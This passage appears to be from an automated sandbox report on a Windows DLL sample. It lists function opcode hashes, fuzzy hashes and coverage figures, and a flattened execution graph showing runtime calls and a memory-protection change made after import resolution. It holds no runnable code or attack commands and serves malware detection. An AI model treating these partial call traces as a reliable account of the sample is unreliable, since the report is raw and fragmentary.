                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 54e5b5619d571603c200bd74151ac838855b57b9a9500bcb452a07e787fb488b
                                                                                                                                                                                                                                            • Instruction ID: 3894f228003730a4e00ff08f99b793eeddb829c123ad78c49bc38c6069df2a33
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54e5b5619d571603c200bd74151ac838855b57b9a9500bcb452a07e787fb488b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CE0923DB043559BDB19276E5420AEF3AEB8FC55A1B89006BDA05CB281FD648851C2E1
                                                                                                                                                                                                                                            Function 06D046C0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e37e7c607fd85ef4cc2604fcfe3d2aa7da3597fbd0122f8252240cc146dfe4d7
                                                                                                                                                                                                                                            • Instruction ID: 282590b23339b5d6d549eee0ed159cc14aba0cb3b536a3128a329bc6fdff6654
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e37e7c607fd85ef4cc2604fcfe3d2aa7da3597fbd0122f8252240cc146dfe4d7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4E04F3DB102159B9A59236E5414A6F25DB8BC55A13C8012A9705C73C4FD64CC02C2E2
                                                                                                                                                                                                                                            Function 06D0AE88 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 739b83ee3e8789f9f6d87577216a65a5bc56a12be4202b489ed717ea8ab57cf7
                                                                                                                                                                                                                                            • Instruction ID: 15491a100b8aa86e7b58a1ee596b5d5a1bcccf02df1d3d5310b6f167f5686f29
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 739b83ee3e8789f9f6d87577216a65a5bc56a12be4202b489ed717ea8ab57cf7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DF03471604A018FC725DF08D180966F7E6FB8832571ACA5EC8AA87B41D334F856CB80
                                                                                                                                                                                                                                            Function 06D0D4D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e22baa22eac3f060f4970088fb12622d04ad25f53f16dc61af2303f2f21043d6
                                                                                                                                                                                                                                            • Instruction ID: 638936e9772f394e76de9afc3eb4a9969faeae1ae004072aec47854a0cbfc32f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e22baa22eac3f060f4970088fb12622d04ad25f53f16dc61af2303f2f21043d6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF0653691021CAB9F50DF988C055ED3BA5EF0A339F144522FD65D21C1D375E660DBA2
                                                                                                                                                                                                                                            Function 06D0DE74 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: fa341d190e3d4afd65a8e85012850a67647cac1bfbb7b34a16491fd675145b3a
                                                                                                                                                                                                                                            • Instruction ID: d9a49033cbe15f17e59f0b135efcaf608641834283044aff84d692bcbbc9f6b7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa341d190e3d4afd65a8e85012850a67647cac1bfbb7b34a16491fd675145b3a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61E026313400105B8288661E98C497E77CADBCD62031144BAF20DC3352CD20CC050390
                                                                                                                                                                                                                                            Function 06D0FA1A Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 38ad90c3a3f4a3659b9042024c42ec6bbbc31d5537f7ec0f7042b3d37fe10710
                                                                                                                                                                                                                                            • Instruction ID: 343fdac6f59195aea9e8db3f8f4c55d957b77a69d27966d5ae91653950ff4778
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38ad90c3a3f4a3659b9042024c42ec6bbbc31d5537f7ec0f7042b3d37fe10710
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EE0DF727040501FC794662DA894ABE6BDADBCDA20B1600BEE20DC7363D9218C068311
                                                                                                                                                                                                                                            Function 06D03DD8 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 44e63139b111aaeb520228cffc7d208d0c1adac22317e01861c557afef01833f
                                                                                                                                                                                                                                            • Instruction ID: f5018cb16fe064ddc183011083415bf7f194abae72dd4e72207dca5380b68737
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44e63139b111aaeb520228cffc7d208d0c1adac22317e01861c557afef01833f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81D0A7A270827007C751125C79047BE6ED68BCA621B0804FFED02CB387DA500D054395
                                                                                                                                                                                                                                            Function 06D05C19 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 55d705bce8d63b15c8167ad53cd754de3dfdd7798161effd5dfc8dbf0e630663
                                                                                                                                                                                                                                            • Instruction ID: c33e2a5fd868d23e6ee6babd7a188c3e7dd0e0d5bc5b7f49e604d07b91a38754
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55d705bce8d63b15c8167ad53cd754de3dfdd7798161effd5dfc8dbf0e630663
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60E012705493849FC715CB24E944A517F65AF46205B1884E9E8084F163EB22E845DA51
                                                                                                                                                                                                                                            Function 06D0D84E Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 598d7e092770c6c92b303347d5fc576bc9362dc4819ebd7c3eef86eebc1c8e6b
                                                                                                                                                                                                                                            • Instruction ID: 4e0febd097ab8538d8e030349ddb58dd1af0f6e475104fff4a56a22f9e7a57bb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 598d7e092770c6c92b303347d5fc576bc9362dc4819ebd7c3eef86eebc1c8e6b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DD09239A40109CFDB00DB98E589AECB7F1FB88319F2441A6D60997761C331A955CB90
                                                                                                                                                                                                                                            Function 06D05C28 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 18a8a56dd9f46154285a57455508cce21adb25081020c9ab6f585991bbc0f9ba
                                                                                                                                                                                                                                            • Instruction ID: 7c7afbfa6f801c075395e236d0df242f68b3228b6c5cd5a88ac442a79944b0c6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18a8a56dd9f46154285a57455508cce21adb25081020c9ab6f585991bbc0f9ba
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66D01230200204CFC708DF28EA85C217BA8FF49708718C5A8F0088F232DB32EC42CE91

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 06D0BDA8 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: @$@$B$B$Hhq
                                                                                                                                                                                                                                            • API String ID: 0-3150279512
                                                                                                                                                                                                                                            • Opcode ID: 59dd31f8c6ea86550d56207ade62e519e004459bb7e156bd459bede3498ae00f
                                                                                                                                                                                                                                            • Instruction ID: e4fdbfca345e52df2e0969bb8ae74ab4b34eba5ca4a10537a86181975528c1c6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59dd31f8c6ea86550d56207ade62e519e004459bb7e156bd459bede3498ae00f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51D435B046058FD764DF79D88066ABBF6FF8922071485AAE519C73A1DB32DC42CB90
                                                                                                                                                                                                                                            Function 06D0BD98 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: @$@$B$B
                                                                                                                                                                                                                                            • API String ID: 0-685577651
                                                                                                                                                                                                                                            • Opcode ID: be9d53089e14dfa03aeebf25fc87314955dd579f6cf8283a82d86f5b49e9ca6c
                                                                                                                                                                                                                                            • Instruction ID: 75bff0565d159f21c6a9252dcc61aeaf8266e7a3414960ed0462cf2f832efb81
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be9d53089e14dfa03aeebf25fc87314955dd579f6cf8283a82d86f5b49e9ca6c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8219F71F046168FEB64CF6DD884A6EBBF5EF8821471441ABE216D72A1D732DD40CB81

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:2.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:1659
                                                                                                                                                                                                                                            Total number of Limit Nodes:5
                                                                                                                                                                                                                                            execution_graph 6732 10007a80 6733 10007a8d 6732->6733 6734 1000637b _abort 20 API calls 6733->6734 6735 10007aa7 6734->6735 6736 1000571e _free 20 API calls 6735->6736 6737 10007ab3 6736->6737 6738 1000637b _abort 20 API calls 6737->6738 6741 10007ad9 6737->6741 6740 10007acd 6738->6740 6739 10005eb7 11 API calls 6739->6741 6742 1000571e _free 20 API calls 6740->6742 6741->6739 6743 10007ae5 6741->6743 6742->6741 7172 10007103 GetCommandLineA GetCommandLineW 7173 10005303 7176 100050a5 7173->7176 7185 1000502f 7176->7185 7179 1000502f 5 API calls 7180 100050c3 7179->7180 7181 10005000 20 API calls 7180->7181 7182 100050ce 7181->7182 7183 10005000 20 API calls 7182->7183 7184 100050d9 7183->7184 7186 10005048 7185->7186 7187 10002ada _ValidateLocalCookies 5 API calls 7186->7187 7188 10005069 7187->7188 7188->7179 6744 10009c88 6745 10009c95 6744->6745 6746 10009ca9 6745->6746 6749 10009ccd 6745->6749 6756 10009cc0 6745->6756 6747 10009cb0 6746->6747 6748 10009cc4 6746->6748 6752 10006368 _free 20 API calls 6747->6752 6751 10006332 __dosmaperr 20 API calls 6748->6751 6755 10006368 _free 20 API calls 6749->6755 6749->6756 6750 10002ada _ValidateLocalCookies 5 API calls 6753 10009d15 6750->6753 6751->6756 6754 10009cb5 6752->6754 6757 10006355 __dosmaperr 20 API calls 6754->6757 6758 10009cf2 6755->6758 6756->6750 6757->6756 6759 10006355 __dosmaperr 20 API calls 6758->6759 6759->6756 6760 10008a89 6763 10006d60 6760->6763 6764 10006d69 6763->6764 6765 10006d72 6763->6765 6767 10006c5f 6764->6767 6768 10005af6 _abort 38 API calls 6767->6768 6769 10006c6c 6768->6769 6770 10006d7e 38 API calls 6769->6770 6771 10006c74 6770->6771 6787 100069f3 6771->6787 6774 10006c8b 6774->6765 6779 1000571e _free 20 API calls 6779->6774 6780 10006cc9 6782 10006368 _free 20 API calls 6780->6782 6781 10006ce6 6783 10006d12 6781->6783 6784 1000571e _free 20 API calls 6781->6784 6786 10006cce 6782->6786 6783->6786 6811 100068c9 6783->6811 6784->6783 6786->6779 6788 100054a7 38 API calls 6787->6788 6789 10006a05 6788->6789 6790 10006a14 GetOEMCP 6789->6790 6791 10006a26 6789->6791 6793 10006a3d 6790->6793 6792 10006a2b GetACP 6791->6792 6791->6793 6792->6793 6793->6774 6794 100056d0 6793->6794 6795 1000570e 6794->6795 6799 100056de _abort 6794->6799 6797 10006368 _free 20 API calls 6795->6797 6796 100056f9 RtlAllocateHeap 6798 1000570c 6796->6798 6796->6799 6797->6798 6798->6786 6801 10006e20 6798->6801 6799->6795 6799->6796 6800 1000474f _abort 7 API calls 6799->6800 6800->6799 6802 100069f3 40 API calls 6801->6802 6803 10006e3f 6802->6803 6806 10006e90 IsValidCodePage 6803->6806 6808 10006e46 6803->6808 6810 10006eb5 ___scrt_fastfail 6803->6810 6804 10002ada _ValidateLocalCookies 5 API calls 6805 10006cc1 6804->6805 6805->6780 6805->6781 6807 10006ea2 GetCPInfo 6806->6807 6806->6808 6807->6808 6807->6810 6808->6804 6814 10006acb GetCPInfo 6810->6814 6887 10006886 6811->6887 6813 100068ed 6813->6786 6815 10006b05 6814->6815 6823 10006baf 6814->6823 6824 100086e4 6815->6824 6818 10002ada _ValidateLocalCookies 5 API calls 6820 10006c5b 6818->6820 6820->6808 6822 10008a3e 43 API calls 6822->6823 6823->6818 6825 100054a7 38 API calls 6824->6825 6826 10008704 MultiByteToWideChar 6825->6826 6828 10008742 6826->6828 6829 100087da 6826->6829 6831 100056d0 21 API calls 6828->6831 6834 10008763 ___scrt_fastfail 6828->6834 6830 10002ada _ValidateLocalCookies 5 API calls 6829->6830 6832 10006b66 6830->6832 6831->6834 6838 10008a3e 6832->6838 6833 100087d4 6843 10008801 6833->6843 6834->6833 6836 100087a8 MultiByteToWideChar 6834->6836 6836->6833 6837 100087c4 GetStringTypeW 6836->6837 6837->6833 6839 100054a7 38 API calls 6838->6839 6840 10008a51 6839->6840 6847 10008821 6840->6847 6844 1000880d 6843->6844 6845 1000881e 6843->6845 6844->6845 6846 1000571e _free 20 API calls 6844->6846 6845->6829 6846->6845 6848 1000883c 6847->6848 6849 10008862 MultiByteToWideChar 6848->6849 6850 10008a16 6849->6850 6851 1000888c 6849->6851 6852 10002ada _ValidateLocalCookies 5 API calls 6850->6852 6856 100056d0 21 API calls 6851->6856 6857 100088ad 6851->6857 6853 10006b87 6852->6853 6853->6822 6854 100088f6 MultiByteToWideChar 6855 10008962 6854->6855 6858 1000890f 6854->6858 6860 10008801 __freea 20 API calls 6855->6860 6856->6857 6857->6854 6857->6855 6874 10005f19 6858->6874 6860->6850 6862 10008971 6864 100056d0 21 API calls 6862->6864 6868 10008992 6862->6868 6863 10008939 6863->6855 6866 10005f19 11 API calls 6863->6866 6864->6868 6865 10008a07 6867 10008801 __freea 20 API calls 6865->6867 6866->6855 6867->6855 6868->6865 6869 10005f19 11 API calls 6868->6869 6870 100089e6 6869->6870 6870->6865 6871 100089f5 WideCharToMultiByte 6870->6871 6871->6865 6872 10008a35 6871->6872 6873 10008801 __freea 20 API calls 6872->6873 6873->6855 6875 10005c45 _abort 5 API calls 6874->6875 6876 10005f40 6875->6876 6879 10005f49 6876->6879 6882 10005fa1 6876->6882 6880 10002ada _ValidateLocalCookies 5 API calls 6879->6880 6881 10005f9b 6880->6881 6881->6855 6881->6862 6881->6863 6883 10005c45 _abort 5 API calls 6882->6883 6884 10005fc8 6883->6884 6885 10002ada _ValidateLocalCookies 5 API calls 6884->6885 6886 10005f89 LCMapStringW 6885->6886 6886->6879 6888 10006892 ___scrt_is_nonwritable_in_current_image 6887->6888 6895 10005671 RtlEnterCriticalSection 6888->6895 6890 1000689c 6896 100068f1 6890->6896 6894 100068b5 _abort 6894->6813 6895->6890 6908 10007011 6896->6908 6898 1000693f 6899 10007011 26 API calls 6898->6899 6900 1000695b 6899->6900 6901 10007011 26 API calls 6900->6901 6902 10006979 6901->6902 6903 100068a9 6902->6903 6904 1000571e _free 20 API calls 6902->6904 6905 100068bd 6903->6905 6904->6903 6922 100056b9 RtlLeaveCriticalSection 6905->6922 6907 100068c7 6907->6894 6909 10007022 6908->6909 6918 1000701e 6908->6918 6910 10007029 6909->6910 6914 1000703c ___scrt_fastfail 6909->6914 6911 10006368 _free 20 API calls 6910->6911 6912 1000702e 6911->6912 6913 100062ac ___std_exception_copy 26 API calls 6912->6913 6913->6918 6915 10007073 6914->6915 6916 1000706a 6914->6916 6914->6918 6915->6918 6920 10006368 _free 20 API calls 6915->6920 6917 10006368 _free 20 API calls 6916->6917 6919 1000706f 6917->6919 6918->6898 6921 100062ac ___std_exception_copy 26 API calls 6919->6921 6920->6919 6921->6918 6922->6907 6923 1000508a 6924 100050a2 6923->6924 6925 1000509c 6923->6925 6926 10005000 20 API calls 6925->6926 6926->6924 6022 1000220c 6023 10002215 6022->6023 6024 1000221a dllmain_dispatch 6022->6024 6026 100022b1 6023->6026 6027 100022c7 6026->6027 6029 100022d0 6027->6029 6030 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6027->6030 6029->6024 6030->6029 6927 10003c90 RtlUnwind 6031 10002418 6032 10002420 ___scrt_release_startup_lock 6031->6032 6035 100047f5 6032->6035 6034 10002448 6036 10004804 6035->6036 6037 10004808 6035->6037 6036->6034 6040 10004815 6037->6040 6041 10005b7a _free 20 API calls 6040->6041 6044 1000482c 6041->6044 6042 10002ada _ValidateLocalCookies 5 API calls 6043 10004811 6042->6043 6043->6034 6044->6042 6928 10004a9a 6931 10005411 6928->6931 6932 1000541d _abort 6931->6932 6933 10005af6 _abort 38 API calls 6932->6933 6936 10005422 6933->6936 6934 100055a8 _abort 38 API calls 6935 1000544c 6934->6935 6936->6934 7580 1000679a 7581 100067a4 7580->7581 7582 100067b4 7581->7582 7583 1000571e _free 20 API calls 7581->7583 7584 1000571e _free 20 API calls 7582->7584 7583->7581 7585 100067bb 7584->7585 6045 1000281c 6048 10002882 6045->6048 6051 10003550 6048->6051 6050 1000282a 6052 1000355d 6051->6052 6056 1000358a 6051->6056 6053 100047e5 ___std_exception_copy 21 API calls 6052->6053 6052->6056 6054 1000357a 6053->6054 6054->6056 6057 1000544d 6054->6057 6056->6050 6058 1000545a 6057->6058 6059 10005468 6057->6059 6058->6059 6064 1000547f 6058->6064 6060 10006368 _free 20 API calls 6059->6060 6061 10005470 6060->6061 6066 100062ac 6061->6066 6063 1000547a 6063->6056 6064->6063 6065 10006368 _free 20 API calls 6064->6065 6065->6061 6069 10006231 6066->6069 6068 100062b8 6068->6063 6070 10005b7a _free 20 API calls 6069->6070 6071 10006247 6070->6071 6072 10006255 6071->6072 6073 100062a6 6071->6073 6078 10002ada _ValidateLocalCookies 5 API calls 6072->6078 6080 100062bc IsProcessorFeaturePresent 6073->6080 6075 100062ab 6076 10006231 ___std_exception_copy 26 API calls 6075->6076 6077 100062b8 6076->6077 6077->6068 6079 1000627c 6078->6079 6079->6068 6081 100062c7 6080->6081 6084 100060e2 6081->6084 6085 100060fe ___scrt_fastfail 6084->6085 6086 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6085->6086 6088 100061fb ___scrt_fastfail 6086->6088 6087 10002ada _ValidateLocalCookies 5 API calls 6089 10006219 GetCurrentProcess TerminateProcess 6087->6089 6088->6087 6089->6075 7589 100021a1 ___scrt_dllmain_exception_filter 6090 10009c23 6091 10009c56 6090->6091 6092 10009c28 6090->6092 6128 10009728 6091->6128 6094 10009c46 6092->6094 6095 10009c2d 6092->6095 6120 100098f5 6094->6120 6096 10009ccd 6095->6096 6113 10009807 6095->6113 6099 10006368 _free 20 API calls 6096->6099 6105 10009cc0 6096->6105 6101 10009cf2 6099->6101 6100 10009bf2 6100->6096 6104 10009ca9 6100->6104 6100->6105 6102 10006355 __dosmaperr 20 API calls 6101->6102 6102->6105 6103 10002ada _ValidateLocalCookies 5 API calls 6106 10009d15 6103->6106 6107 10009cb0 6104->6107 6108 10009cc4 6104->6108 6105->6103 6110 10006368 _free 20 API calls 6107->6110 6138 10006332 6108->6138 6111 10009cb5 6110->6111 6135 10006355 6111->6135 6115 10009816 6113->6115 6114 100098d8 6117 10002ada _ValidateLocalCookies 5 API calls 6114->6117 6115->6114 6116 10009894 WriteFile 6115->6116 6116->6115 6118 100098da GetLastError 6116->6118 6119 100098f1 6117->6119 6118->6114 6119->6100 6121 10009904 6120->6121 6122 10009a0f 6121->6122 6125 10009986 WideCharToMultiByte 6121->6125 6127 100099bb WriteFile 6121->6127 6123 10002ada _ValidateLocalCookies 5 API calls 6122->6123 6124 10009a1e 6123->6124 6124->6100 6126 10009a07 GetLastError 6125->6126 6125->6127 6126->6122 6127->6121 6127->6126 6133 10009737 6128->6133 6129 100097ea 6130 10002ada _ValidateLocalCookies 5 API calls 6129->6130 6134 10009803 6130->6134 6131 100097a9 WriteFile 6132 100097ec GetLastError 6131->6132 6131->6133 6132->6129 6133->6129 6133->6131 6134->6100 6136 10005b7a _free 20 API calls 6135->6136 6137 1000635a 6136->6137 6137->6105 6139 10006355 __dosmaperr 20 API calls 6138->6139 6140 1000633d _free 6139->6140 6141 10006368 _free 20 API calls 6140->6141 6142 10006350 6141->6142 6142->6105 5764 1000c7a7 5765 1000c7be 5764->5765 5769 1000c82c 5764->5769 5765->5769 5776 1000c7e6 GetModuleHandleA 5765->5776 5767 1000c835 GetModuleHandleA 5770 1000c83f 5767->5770 5768 1000c872 5769->5767 5769->5768 5769->5770 5770->5769 5771 1000c85f GetProcAddress 5770->5771 5771->5769 5772 1000c7dd 5772->5769 5772->5770 5773 1000c800 GetProcAddress 5772->5773 5773->5769 5774 1000c80d VirtualProtect 5773->5774 5774->5769 5775 1000c81c VirtualProtect 5774->5775 5775->5769 5777 1000c82c 5776->5777 5778 1000c7ef 5776->5778 5781 1000c872 5777->5781 5782 1000c835 GetModuleHandleA 5777->5782 5783 1000c83f 5777->5783 5788 1000c803 GetProcAddress 5778->5788 5780 1000c7f4 5780->5777 5784 1000c800 GetProcAddress 5780->5784 5782->5783 5783->5777 5783->5783 5787 1000c85f GetProcAddress 5783->5787 5784->5777 5785 1000c80d VirtualProtect 5784->5785 5785->5777 5786 1000c81c VirtualProtect 5785->5786 5786->5777 5787->5777 5789 1000c82c 5788->5789 5790 1000c80d VirtualProtect 5788->5790 5792 1000c872 5789->5792 5793 1000c835 GetModuleHandleA 5789->5793 5790->5789 5791 1000c81c VirtualProtect 5790->5791 5791->5789 5795 1000c83f 5793->5795 5794 1000c85f GetProcAddress 5794->5795 5795->5789 5795->5794 7590 10009fa7 7591 10006368 _free 20 API calls 7590->7591 7592 10009fac 7591->7592 6143 1000742b 6144 10007430 6143->6144 6146 10007453 6144->6146 6147 10008bae 6144->6147 6148 10008bdd 6147->6148 6149 10008bbb 6147->6149 6148->6144 6150 10008bd7 6149->6150 6151 10008bc9 RtlDeleteCriticalSection 6149->6151 6152 1000571e _free 20 API calls 6150->6152 6151->6150 6151->6151 6152->6148 6937 100060ac 6938 100060dd 6937->6938 6940 100060b7 6937->6940 6939 100060c7 FreeLibrary 6939->6940 6940->6938 6940->6939 6941 1000aeac 6942 1000aeb5 6941->6942 6943 10008cc1 21 API calls 6942->6943 6944 1000aebb 6943->6944 6945 10006332 __dosmaperr 20 API calls 6944->6945 6946 1000aedd 6944->6946 6945->6946 6153 10005630 6154 1000563b 6153->6154 6156 10005664 6154->6156 6158 10005660 6154->6158 6159 10005eb7 6154->6159 6166 10005688 6156->6166 6160 10005c45 _abort 5 API calls 6159->6160 6161 10005ede 6160->6161 6162 10005efc InitializeCriticalSectionAndSpinCount 6161->6162 6163 10005ee7 6161->6163 6162->6163 6164 10002ada _ValidateLocalCookies 5 API calls 6163->6164 6165 10005f13 6164->6165 6165->6154 6167 100056b4 6166->6167 6168 10005695 6166->6168 6167->6158 6169 1000569f RtlDeleteCriticalSection 6168->6169 6169->6167 6169->6169 6951 100096b2 6958 10008dbc 6951->6958 6953 100096c2 6954 100096c7 6953->6954 6955 10005af6 _abort 38 API calls 6953->6955 6956 100096ea 6955->6956 6956->6954 6957 10009708 GetConsoleMode 6956->6957 6957->6954 6959 10008dc9 6958->6959 6960 10008dd6 6958->6960 6961 10006368 _free 20 API calls 6959->6961 6963 10008de2 6960->6963 6964 10006368 _free 20 API calls 6960->6964 6962 10008dce 6961->6962 6962->6953 6963->6953 6965 10008e03 6964->6965 6966 100062ac ___std_exception_copy 26 API calls 6965->6966 6966->6962 6967 10003eb3 6968 10005411 38 API calls 6967->6968 6969 10003ebb 6968->6969 7193 